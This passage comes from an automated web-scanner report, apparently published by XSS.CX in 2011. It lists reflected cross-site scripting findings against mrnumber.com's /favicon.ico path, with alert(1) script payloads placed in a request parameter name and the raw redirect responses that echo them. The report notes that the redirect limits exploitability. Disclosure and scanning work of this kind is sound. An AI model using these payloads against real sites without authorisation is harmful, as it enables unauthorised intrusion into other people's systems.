Location: http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1
Content-Type: text/html
Content-Length: 270
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1">http://mrnumber.com/favicon. ...[SNIP]...
3.202. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.mrnumber.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 193b8<script>alert(1)</script>9fa070849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1
Content-Type: text/html
Content-Length: 264
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1">http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1</a> ...[SNIP]...
Report generated by XSS.CX at Fri Apr 22 23:36:39 CDT 2011.